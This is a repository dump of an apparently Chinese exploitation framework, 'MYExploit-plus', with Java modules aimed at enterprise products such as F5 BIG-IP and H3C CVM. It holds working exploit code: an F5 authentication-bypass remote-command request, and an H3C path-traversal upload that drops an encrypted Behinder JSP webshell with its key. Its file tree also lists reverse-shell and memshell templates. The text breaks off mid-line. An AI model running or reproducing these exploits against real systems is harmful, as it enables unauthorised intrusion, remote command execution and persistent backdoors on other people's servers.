├── NewVersionUrl ├── README.md ├── img ├── image-20240110105025032.png ├── image-20240110105111699.png ├── image-20240110105403304.png ├── image-20240110110508003.png ├── image-20240110111028682.png └── image-20240110114453028.png ├── lib ├── NCLogin65.jar ├── basic.jar ├── borland_bin_client.jar ├── cglib-nodep-2.2.jar ├── dl.jar ├── fwpub.jar ├── granite.jar ├── log.jar ├── uapwstool.jar └── xerces.jar └── src └── main └── java └── com └── achuna33 ├── Controllers ├── AnHengController.java ├── BasicController.java ├── BasicMapping.java ├── Console.java ├── Controller.java ├── CustomController.java ├── DaHuaController.java ├── F5BigipController.java ├── FumengYunController.java ├── H3CController.java ├── HIKVISIONController.java ├── HuaTianController.java ├── JhSoftController.java ├── JinShanController.java ├── KingdeeController.java ├── LandrayController.java ├── QiAnXinController.java ├── SangForController.java ├── SeeyonController.java ├── SerializedDataController.java ├── SpringController.java ├── TRXController.java ├── TongDaController.java ├── VulnerabilityDescriptionMapping.java ├── WanhuController.java ├── WeaverController.java ├── WeaverEMoblieController.java ├── WeaverEOfficeController.java ├── XYController.java ├── XinDianController.java ├── YiSaitongController.java ├── YimiController.java ├── YongyouController.java ├── ehrController.java ├── fineReportController.java └── iofficeController.java ├── Exceptions ├── IncorrectParamsException.java ├── NullMethodArgsException.java ├── UnSupportedActionTypeException.java ├── UnSupportedGadgetTypeException.java └── UnSupportedPayloadTypeException.java ├── Gadgets ├── C3P0.java ├── CommonsBeanutils1.java ├── CommonsBeanutils2.java ├── CommonsCollectionsK1.java ├── CommonsCollectionsK2.java ├── JRMPClient.java ├── JRMPClient2.java ├── JRMPClientExploit.java ├── Jdk7u21.java ├── Jre8u20.java ├── RMIRegistryExploitJdk8u231.java ├── URLDNS.java └── utils │ ├── ClassFiles.java │ ├── ExecCheckingSecurityManager.java 
│ ├── Gadgets.java │ ├── Reflections.java │ └── Util.java ├── MainApplication.java ├── SupportType ├── GadgetType.java ├── MyDIYType.java ├── PayloadType.java ├── Poc_Exp.java ├── SupportType.java └── SupportVul.java ├── Templates ├── CommandEchoTemplate.java ├── CommandTemplate.java ├── DnslogTemplate.java ├── DynamicFilterTemplate.java ├── DynamicInterceptorTemplate.java ├── JettyMemshellTemplate.java ├── MyClassLoader.java ├── NettyMemshellTemplate.java ├── PutfileTemplate.java ├── ReverseShellTemplate.java ├── Template.java ├── TomcatEchoTemplate.java ├── TomcatMemshellTemplate1.java ├── TomcatMemshellTemplate2.java └── myClassTemplate.java ├── UI └── UIController.java ├── Update └── Update.java └── Utils ├── AESEncodeMain.java ├── ASMChanger.java ├── Cache.java ├── DNSLOG.java ├── HttpRequest.java ├── Intruder.java ├── MyURLClassLoader.java └── Response.java /NewVersionUrl: -------------------------------------------------------------------------------- 1 | https://github.com/zhaoyumi/MYExploit/releases/download/v2.0.5/MYExploit-2.0.5-SNAPSHOT.jar -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

🌟MYExploit-plus

2 | 3 | ![Static Badge](https://img.shields.io/badge/author-duidui-blue) 4 | 5 | 6 | ## 项目简介 7 | 二开修改的工具:https://github.com/achuna33/MYExploit 8 | 9 | 一款扩展性高的渗透测试框架(完善中) 10 | 11 | 新增了泛微、用友、亿赛通等多种漏洞集合。 12 | 13 | 14 | ### 长期改Buging And 目前只支持部分EXP 利用 (慢慢写ing) 15 | 16 | ~~😘喜欢就给个star吧!~~ 17 | 18 | ![image-20240110105025032](img/image-20240110105025032.png) 19 | 20 | 21 | ![image-20240110105111699](img/image-20240110105111699.png) 22 | 23 | ![image-20240110105403304](img/image-20240110105403304.png) 24 | 25 | ![image-20240110110508003](img/image-20240110110508003.png) 26 | 27 | ![image-20240110111028682](img/image-20240110111028682.png) 28 | 29 | ![image-20240110114453028](img/image-20240110114453028.png) 30 | 31 | 32 | 33 | ## 使用声明 34 | 本工具仅用于安全测试目的 35 | 用于非法用途与开发者无关 36 | 37 | -------------------------------------------------------------------------------- /img/image-20240110105025032.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110105025032.png -------------------------------------------------------------------------------- /img/image-20240110105111699.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110105111699.png -------------------------------------------------------------------------------- /img/image-20240110105403304.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110105403304.png -------------------------------------------------------------------------------- /img/image-20240110110508003.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110110508003.png -------------------------------------------------------------------------------- /img/image-20240110111028682.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110111028682.png -------------------------------------------------------------------------------- /img/image-20240110114453028.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110114453028.png -------------------------------------------------------------------------------- /lib/NCLogin65.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/NCLogin65.jar -------------------------------------------------------------------------------- /lib/basic.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/basic.jar -------------------------------------------------------------------------------- /lib/borland_bin_client.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/borland_bin_client.jar -------------------------------------------------------------------------------- /lib/cglib-nodep-2.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/cglib-nodep-2.2.jar 
-------------------------------------------------------------------------------- /lib/dl.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/dl.jar -------------------------------------------------------------------------------- /lib/fwpub.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/fwpub.jar -------------------------------------------------------------------------------- /lib/granite.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/granite.jar -------------------------------------------------------------------------------- /lib/log.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/log.jar -------------------------------------------------------------------------------- /lib/uapwstool.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/uapwstool.jar -------------------------------------------------------------------------------- /lib/xerces.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/xerces.jar -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/AnHengController.java: -------------------------------------------------------------------------------- 1 | 2 | package com.achuna33.Controllers; 3 | 4 | 
import com.achuna33.SupportType.Poc_Exp; 5 | import com.achuna33.SupportType.SupportVul; 6 | import com.achuna33.Utils.Cache; 7 | import com.achuna33.Utils.HttpRequest; 8 | import com.achuna33.Utils.Response; 9 | 10 | import java.net.MalformedURLException; 11 | @BasicMapping(uri = "安恒") 12 | public class AnHengController extends Controller implements BasicController{ 13 | @VulnerabilityDescriptionMapping(Description = "安恒 安恒信息-明御WAF report.m 任意用户登录",SupportVulType = SupportVul.信息泄露) 14 | public void vul_user(Poc_Exp type, String target, Object... args) throws MalformedURLException { 15 | WriteLog("\n开始检测: vul_user_任意用户登录"); 16 | 17 | 18 | switch (type){ 19 | case EXP: 20 | break; 21 | case POC: 22 | HttpRequest httpRequest = new HttpRequest(target+"/report.m?a=rpc-timed"); 23 | Response result = httpRequest.Get(""); 24 | 25 | 26 | if(result.responseBody.contains("error_0x110005")&&result.statusCode==200){ 27 | WriteLog("\n 存在漏洞"); 28 | WriteLog("\n请求地址:"+target+"/report.m?a=rpc-timed\r\n"); 29 | WriteLog("请求完成后访问目标ip:端口\r\n"); 30 | WriteLog(target+"/config.m?a=management上传特定dat文件可rce"); 31 | // WriteLog("\n"+result1.responseBody); 32 | }else { 33 | WriteLog("\n[-] 不存在漏洞"); 34 | } 35 | } 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/BasicController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | public interface BasicController { 4 | 5 | } 6 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/BasicMapping.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | 8 | 
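/**
 * Marks a controller class with the product name it is registered under.
 * {@code uri} is the string shown in the UI product selector and, presumably, the key
 * used for the {@code Cache.routes} lookup in {@link Console} — confirm against Cache.
 */
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.TYPE)
public @interface BasicMapping {
    String uri();
}
-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/Console.java: --------------------------------------------------------------------------------
package com.achuna33.Controllers;

import com.achuna33.Exceptions.NullMethodArgsException;
import com.achuna33.Gadgets.utils.Util;
import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.UI.UIController;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.Utils;

import java.io.File;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.List;

import static com.achuna33.Utils.Cache.WriteLogBase;

/**
 * Worker thread that dispatches one scan run to a product controller.
 *
 * <p>{@link #run()} reflectively calls the public method named by {@link #MethodName}
 * (here {@code GoPoc} or {@code GoExp}) with {@link #Product} as its single argument.
 * The controller instance is taken from {@code Cache.routes} and its vulnerability
 * methods from {@code Cache.getVulRoutesValue(product)}; each of those methods is
 * invoked as {@code (Poc_Exp, String target, Object... args)}.
 *
 * <p>NOTE(review): {@code MethodName} and {@code Product} are static, so Console threads
 * started close together share — and may overwrite — each other's values. Confirm callers
 * start them one at a time, or turn these into instance fields.
 */
public class Console extends Thread {

    public static String MethodName ;
    public static String Product;
    /** Extra arguments for this thread; {@code args[0]} is read as the target URL when present. */
    public Object[] args;

    @Override
    public void run() {
        try {
            Method runMethod = this.getClass().getMethod(MethodName, String.class);
            runMethod.invoke(this, Product);
        } catch (NoSuchMethodException | IllegalAccessException e) {
            e.printStackTrace();
        } catch (InvocationTargetException e) {
            // Surface the controller's own exception, not only the reflective wrapper.
            (e.getCause() != null ? e.getCause() : e).printStackTrace();
        }
    }

    public void setMethodName(String methodName){
        MethodName = methodName;
    }

    public void setProduct(String product){
        Product = product;
    }

    public void setArgs(Object... objects){
        args = objects;
    }

    /**
     * Runs the POC branch of one or all vulnerability methods of {@code product}.
     *
     * <p>When {@link #args} carries a target ({@code args[0]}), a per-thread log file name is
     * registered in {@code Cache.ThreadIdForLog} so {@code Controller.WriteLog} can route to it;
     * otherwise the target is read from the UI address field. The vulnerability selected in the
     * UI ({@code "All"} or a method name) decides whether every method or only the matching
     * one is invoked.
     *
     * @param product key of the controller in {@code Cache.routes}
     * @throws MalformedURLException if the target is not a parseable URL
     */
    public void GoPoc(String product) throws InvocationTargetException, IllegalAccessException, NullMethodArgsException, MalformedURLException {
        BasicController controller = Cache.routes.get(product);
        String target;
        // An empty args array used to fall through to args[0] and throw; treat it like "no args".
        if (this.args != null && this.args.length > 0) {
            target = (String) args[0];
            String id = String.valueOf(Thread.currentThread().getId());
            // The host comes from an untrusted target list; keep only file-name-safe characters
            // so the log path cannot be steered outside LogDirPath.
            String host = safeFileNamePart(new URL(target).getHost());
            String log_name = Cache.uiController.LogDirPath + File.separator + host + "_" + Utils.getRandomString(4) + "_log.log";
            Cache.ThreadIdForLog.put(id, log_name);
            System.out.println("\n//->>开始扫描 " + target);
        } else {
            target = Cache.uiController.targetAddress.getText();
            WriteLogBase("\n//->>开始扫描 " + Cache.uiController.SupportType.getValue() + "的 所有POC\n");
        }

        String VulName = Cache.uiController.SupportVul.getValue();
        String Vultype = Cache.uiController.SupportType.getValue();
        target = normalizeTarget(target, Vultype);

        List<Method> methodList = Cache.getVulRoutesValue(product);
        if ("All".equals(VulName)) {
            for (Method method : methodList) {
                try {
                    System.out.println(method.getName());
                    method.invoke(controller, Poc_Exp.POC, target, args);
                } catch (Exception e) {
                    reportInvokeError(method, e, "", false);
                }
            }
        } else {
            for (Method method : methodList) {
                if (method.getName().equals(VulName)) {
                    try {
                        WriteLogBase("\n[*]开始检测 " + method.getName() + ":");
                        method.invoke(controller, Poc_Exp.POC, target, args);
                        // Only the first method of that name that completes is run.
                        break;
                    } catch (Exception e) {
                        reportInvokeError(method, e, "", true);
                    }
                }
            }
        }
    }

    /**
     * Runs the EXP branch of the single vulnerability method selected in the UI.
     *
     * @param product key of the controller in {@code Cache.routes}
     * @throws MalformedURLException if the UI target is not a parseable URL
     */
    public void GoExp(String product) throws MalformedURLException {
        Cache.uiController.PublicArea.setText("");
        Cache.uiController.PublicArea.appendText("[*]开始:\n");
        // Look the controller up by the parameter, as GoPoc does; run() passes the static
        // Product field here anyway, so this is the same value without the hidden coupling.
        BasicController controller = Cache.routes.get(product);
        String target = getUrl(Cache.uiController.targetAddress.getText());
        String VulName = Cache.uiController.SupportVul.getValue();
        if ("All".equals(VulName)) {
            Controller.WriteLog("\n[*] 指定利用漏洞");
            return;
        }
        List<Method> methodList = Cache.getVulRoutesValue(product);
        for (Method method : methodList) {
            if (method.getName().equals(VulName)) {
                try {
                    WriteLogBase("\n[*]开始检测 " + method.getName() + ":");
                    method.invoke(controller, Poc_Exp.EXP, target, args);
                    break;
                } catch (Exception e) {
                    reportInvokeError(method, e, "[*]", true);
                }
            }
        }
    }

    /**
     * Reduces a target URL to {@code scheme://host[:port]}; the path and query are dropped.
     *
     * @throws MalformedURLException if {@code target} is not a parseable URL
     */
    public static String getUrl(String target) throws MalformedURLException {
        URL url = new URL(target);
        String result = url.getProtocol() + "://" + url.getHost();
        // URL.getPort() is -1 when no explicit port is present.
        if (url.getPort() > -1) {
            result += ":" + url.getPort();
        }
        return result;
    }

    /** Spring targets keep their path (minus a trailing slash); everything else is cut to scheme://host[:port]. */
    private static String normalizeTarget(String target, String vulType) throws MalformedURLException {
        if ("Spring".equals(vulType)) {
            return target.endsWith("/") ? target.substring(0, target.lastIndexOf("/")) : target;
        }
        return getUrl(target);
    }

    /** Replaces every character that is not a letter, digit, dot, underscore or dash, so the result is safe as a file-name component. */
    private static String safeFileNamePart(String s) {
        return s == null ? "unknown" : s.replaceAll("[^A-Za-z0-9._-]", "_");
    }

    /**
     * Prints the (pre-existing) console error message for a failed reflective call, plus the
     * underlying cause so the failure is not silently swallowed; optionally mirrors it to the log.
     */
    private static void reportInvokeError(Method method, Exception e, String consolePrefix, boolean alsoWriteLog) {
        Throwable cause = (e instanceof InvocationTargetException && e.getCause() != null) ? e.getCause() : e;
        System.out.println(consolePrefix + "invoke methos:" + method.getName() + "时出现错误");
        System.out.println("  原因: " + cause);
        if (alsoWriteLog) {
            Controller.WriteLog("\n[*] invoke method:" + method.getName() + "时出现错误");
        }
    }

    public static void main(String[] args) throws MalformedURLException {
        URL url = new URL("http://127.0.0.1/index");
        System.out.println(url.getProtocol());
        System.out.println(url.getHost());
        System.out.println(url.getPort());
    }
}
-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/Controller.java: --------------------------------------------------------------------------------
package com.achuna33.Controllers;

import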
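com.achuna33.UI.UIController;
import com.achuna33.Utils.Cache;
import javafx.application.Platform;

import java.io.File;
import java.io.FileWriter;
import java.io.IOException;
import java.io.PrintWriter;

import static com.achuna33.Utils.Cache.WriteLogBase;

/**
 * Base class of the product controllers: shared log-routing helpers.
 *
 * <p>{@link #WriteLog} sends text to the UI log area ({@code WriteLogBase}) or, when the UI
 * target field starts with {@code "file:"}, to the per-thread log file registered in
 * {@code Cache.ThreadIdForLog}. The remaining helpers differ only in the
 * {@code [*]} / {@code [+]} / {@code [-]} prefix they enforce.
 */
public class Controller {
    public static Boolean FileOrLogArea = false;

    /**
     * Normalises a log line: text already starting with {@code "\n["} is kept as is; anything
     * else has its embedded newlines removed and is prefixed with {@code "\n[*]"}.
     */
    private static String withInfoPrefix(String text) {
        if (text.startsWith("\n[")) {
            return text;
        }
        return "\n[*]" + text.replace("\n", "");
    }

    /**
     * Writes one log line to the per-thread log file (file-list mode) or the UI log area.
     *
     * @param text message; prefixed with {@code [*]} unless it already carries a tag
     */
    public static void WriteLog(String text){
        text = withInfoPrefix(text);
        if (Cache.uiController.targetAddress.getText().startsWith("file:")){
            System.out.println(Thread.currentThread().getId());
            String id = String.valueOf(Thread.currentThread().getId());
            String path = Cache.ThreadIdForLog.get(id);
            if (path == null) {
                // No log file was registered for this thread (it did not go through
                // Console.GoPoc); fall back to the UI area instead of failing on a null path.
                WriteLogBase(text);
            } else {
                WriteLog2File(path, text);
            }
        } else {
            WriteLogBase(text);
        }
    }

    /**
     * Appends one line to the EXP output area.
     * NOTE(review): this touches a JavaFX control and is reached from Console worker threads;
     * confirm the call is marshalled onto the FX thread (e.g. Platform.runLater) upstream.
     */
    public static void WriteExpLog(String text){
        Cache.uiController.PublicArea.appendText(withInfoPrefix(text));
    }

    /**
     * Appends {@code Content} as one line to the log file at {@code filePath}, creating the file
     * when it does not exist. Failures are reported on stderr and never propagate, so a broken
     * log path cannot abort a running scan thread.
     *
     * @param filePath URL-encoded path of the log file
     * @param Content  line to append
     */
    public static void WriteLog2File(String filePath,String Content) {
        try {
            String path = java.net.URLDecoder.decode(filePath, "UTF-8");
            // Original behaviour kept: on macOS the leading slash is re-added — presumably
            // lost when the path was built; verify against how LogDirPath is produced.
            String os = System.getProperty("os.name", "").toLowerCase(java.util.Locale.ROOT);
            if (os.contains("mac os")) {
                path = "/" + path;
            }
            File f = new File(path);
            // FileWriter(f, true) creates the file when missing and appends otherwise;
            // try-with-resources closes both writers even if println fails. The platform
            // default charset is kept so existing log files stay consistent.
            try (FileWriter fw = new FileWriter(f, true);
                 PrintWriter pw = new PrintWriter(fw)) {
                pw.println(Content);
            }
        } catch (IOException e) {
            // Previously a failed open left fw == null and crashed on new PrintWriter(null).
            System.err.println("[-] 写入日志文件失败: " + filePath + " (" + e + ")");
        }
    }

    /** Logs {@code text} with a {@code [+]} tag, replacing an existing {@code "\n[*]"} / {@code "\n[+]"} tag. */
    public static void WriteSuccessLog(String text){
        if (text.startsWith("\n[*]") || text.startsWith("\n[+]")) {
            text = text.substring(4);
        }
        WriteLogBase("\n[+]" + text);
    }

    /** Logs {@code text} with a {@code [-]} tag, replacing an existing {@code "\n[*]"} or {@code "[*]"} tag. */
    public static void WriteFailLog(String text){
        if (text.startsWith("\n[*]")) {
            text = text.substring(4);
        } else if (text.startsWith("[*]")) {
            text = text.substring(3);
        }
        WriteLogBase("\n[-]" + text);
    }
}
-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/CustomController.java: --------------------------------------------------------------------------------
package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;

import java.net.MalformedURLException;

@BasicMapping(uri = "路径扫描")
public class CustomController extends Controller implements BasicController{
    @VulnerabilityDescriptionMapping(Description = "信息泄漏(目录爆破)",SupportVulType = SupportVul.信息泄露)
    public void vul_DirSearch(Poc_Exp type, String target, Object...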
args)throws MalformedURLException { 14 | switch (type){ 15 | case EXP: 16 | break; 17 | case POC: 18 | System.out.format("\33[32;4m我是博主%n");//%n表示换行 19 | System.out.format("\33[32;4m我是你爹%n"); 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/F5BigipController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | import com.achuna33.SupportType.Poc_Exp; 3 | import com.achuna33.SupportType.SupportVul; 4 | import com.achuna33.Utils.HttpRequest; 5 | import com.achuna33.Utils.Response; 6 | import com.achuna33.Utils.Utils; 7 | 8 | import java.net.MalformedURLException; 9 | 10 | @BasicMapping(uri = "F5") 11 | public class F5BigipController extends Controller implements BasicController{ 12 | @VulnerabilityDescriptionMapping(Description = "BIG-IP 远程命令执行漏洞",SupportVulType = SupportVul.RuntimeExec) 13 | public void vul_c_命令执行(Poc_Exp type, String target, Object... 
args) throws MalformedURLException { 14 | WriteLog("\n[*]开始检测: BIG-IP 远程命令执行漏洞 远程命令执行漏洞"); 15 | 16 | 17 | switch (type){ 18 | case EXP: 19 | String command = (String) args[0]; 20 | HttpRequest httpRequest1 = new HttpRequest(target+"/mgmt/tm/util/bash"); 21 | String data2 = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}"; 22 | httpRequest1.addHeaders("Host","127.0.0.1"); 23 | httpRequest1.addHeaders("Authorization","Basic YWRtaW46"); 24 | httpRequest1.addHeaders("X-F5-Auth-Token","a"); 25 | httpRequest1.addHeaders("Content-type",""); 26 | httpRequest1.addHeaders("Accept-Encoding"," gzip, deflate"); 27 | httpRequest1.addHeaders("Content-type","application/json"); 28 | httpRequest1.addHeaders("Accept","*/*"); 29 | httpRequest1.addHeaders("referer","127.0.0.1"); 30 | httpRequest1.addHeaders("ConnectioN","close, X-F5-Auth-Token"); 31 | Response result1 = httpRequest1.Post(data2.replace("id",command)); 32 | WriteLog(result1.responseBody); 33 | break; 34 | case POC: 35 | HttpRequest httpRequest = new HttpRequest(target+"/mgmt/tm/util/bash"); 36 | String data = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}"; 37 | httpRequest.addHeaders("Host","localhost"); 38 | httpRequest.addHeaders("Authorization","Basic YWRtaW46"); 39 | httpRequest.addHeaders("X-F5-Auth-Token","a"); 40 | httpRequest.addHeaders("Content-type","application/json"); 41 | // httpRequest.addHeaders("Content-type",""); 42 | httpRequest.addHeaders("referer","127.0.0.1"); 43 | // System.out.println(httpRequest.getClass()); 44 | httpRequest.addHeaders("Accept-Encoding"," gzip, deflate"); 45 | httpRequest.addHeaders("Accept","*/*"); 46 | httpRequest.addHeaders("ConnectioN","close, X-F5-Auth-Token"); 47 | Response result = httpRequest.Post(data); 48 | if(result.responseBody.contains("uid=")&&result.statusCode==200){ 49 | WriteLog("\n[*] 存在漏洞"); 50 | WriteLog("\n[*]请求地址:"+target+"/mgmt/tm/util/bash"+"未写exp,建议抓包到burp自行修改命令"); 51 | WriteLog("\n"+result.responseBody); 52 | }else { 53 | WriteLog("\n[-] 不存在漏洞"); 54 
| } 55 | } 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/FumengYunController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | 4 | import com.achuna33.SupportType.Poc_Exp; 5 | import com.achuna33.SupportType.SupportVul; 6 | import com.achuna33.Utils.Cache; 7 | import com.achuna33.Utils.HttpRequest; 8 | import com.achuna33.Utils.Response; 9 | 10 | @BasicMapping(uri = "孚盟云") 11 | public class FumengYunController extends Controller implements BasicController{ 12 | @VulnerabilityDescriptionMapping(Description="孚盟云 AjaxMethod.ashx SQL注入漏洞" ,SupportVulType= SupportVul.SQLInjection) 13 | public void vul_Getfile(Poc_Exp type, String target, Object... args) throws Exception { 14 | WriteLog("\n开始检测: 孚盟云 AjaxMethod.ashx SQL注入漏洞"); 15 | 16 | switch (type){ 17 | case EXP: 18 | break; 19 | case POC: 20 | 21 | HttpRequest httpRequest = new HttpRequest(target+"/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27"); 22 | Response result = httpRequest.Get(""); 23 | if(result.responseBody.toLowerCase().contains("'Y'")){ 24 | WriteLog(" 存在漏洞"); 25 | WriteLog(result.responseBody); 26 | }else { 27 | WriteLog(" 不存在漏洞"); 28 | } 29 | WriteLog("\n"+result.responseBody); 30 | } 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/H3CController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.HttpRequest; 6 | import com.achuna33.Utils.Response; 7 | import com.achuna33.Utils.Utils; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri = "H3C") 12 | public class H3CController extends Controller implements 
BasicController{ 13 | @VulnerabilityDescriptionMapping(Description="H3C_CVM_前台任意文件上传漏洞" ,SupportVulType= SupportVul.UploadFile) 14 | public void vul_H3C_CVM(Poc_Exp type, String target, Object... args) throws Exception { 15 | WriteLog("\n[*]开始检测: H3C_CVM_前台任意文件上传漏洞"); 16 | String data = "shellcode"; 17 | String url2 = "/cas/js/lib/buttons/iconfig.jsp"; 18 | String url = "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/iconfig.jsp&name=222"; 19 | switch (type){ 20 | case EXP: 21 | String path = null; 22 | String mypayload = null; 23 | try { 24 | path = (String) args[0]; 25 | try { 26 | byte[] bytes = Utils.readFile(path); 27 | mypayload = new String(bytes); 28 | }catch (Exception e){ 29 | WriteExpLog("\n [*] 文件读取失败"); 30 | } 31 | }catch (Exception e){ 32 | 33 | } 34 | String payload = "<%@page import=\"java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*\" %>\n" + 35 | "<%!\n" + 36 | "private byte[] Decrypt(byte[] data) throws Exception\n" + 37 | "{\n" + 38 | " String key=\"e45e329feb5d925b\";\n" + 39 | "\tfor (int i = 0; i < data.length; i++) {\n" + 40 | "\t\tdata[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15]));\n" + 41 | "\t}\n" + 42 | "\treturn data;\n" + 43 | "}\n" + 44 | "%>\n" + 45 | " <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return\n" + 46 | " super.defineClass(b,0,b.length);}}%>\n" + 47 | " <%if (request.getMethod().equals(\"POST\")){\n" + 48 | " ByteArrayOutputStream bos = new ByteArrayOutputStream();\n" + 49 | " byte[] buf = new byte[512];\n" + 50 | " int length=request.getInputStream().read(buf);\n" + 51 | " while (length>0)\n" + 52 | " {\n" + 53 | " byte[] data= Arrays.copyOfRange(buf,0,length);\n" + 54 | " bos.write(data);\n" + 55 | " length=request.getInputStream().read(buf);\n" + 56 | " }\n" + 57 | " new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);}\n" + 58 | " %>"; 59 | 60 | if (mypayload!=null){ 61 | 
payload = mypayload; 62 | }else { 63 | WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond"); 64 | } 65 | String expshellpath = Utils.getRandomString(4)+".jsp"; 66 | url = url.replace("iconfig.jsp",expshellpath); 67 | HttpRequest httpRequest3 = new HttpRequest(target+url); 68 | httpRequest3.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31"); 69 | httpRequest3.addHeaders("Content-range"," bytes 0-10/20"); 70 | httpRequest3.addHeaders("Accept-Encoding"," gzip, deflate"); 71 | httpRequest3.addHeaders("Content-type",""); 72 | httpRequest3.addHeaders("Accept-Language"," zh-CN,zh;q=0.9"); 73 | httpRequest3.addHeaders("Accept"," text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"); 74 | data = data.replace("shellcode",payload); 75 | 76 | httpRequest3.Post(data); 77 | 78 | Response result1 = new HttpRequest(target +url2.replace("iconfig.jsp",expshellpath)).Get(""); 79 | if(result1.statusCode==200){ 80 | WriteExpLog("\n[*] shell path:\n"+target +url2.replace("iconfig.jsp",expshellpath)); 81 | }else { 82 | WriteExpLog("\n 访问失败:\n"+target +url2.replace("iconfig.jsp",expshellpath)); 83 | WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性"); 84 | 85 | } 86 | break; 87 | case POC: 88 | String shellpath = Utils.getRandomString(4)+".jsp"; 89 | String poc = "c0bb4ba866309a864d22f8853e8f7213"; 90 | HttpRequest httpRequest2 = new HttpRequest(target+url.replace("iconfig.jsp",shellpath)); 91 | httpRequest2.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31"); 92 | httpRequest2.addHeaders("Content-range"," bytes 0-10/20"); 93 | httpRequest2.addHeaders("Accept-Encoding"," gzip, deflate"); 94 | httpRequest2.addHeaders("Content-type",""); 95 | httpRequest2.addHeaders("Accept-Language"," zh-CN,zh;q=0.9"); 96 | httpRequest2.addHeaders("Accept"," 
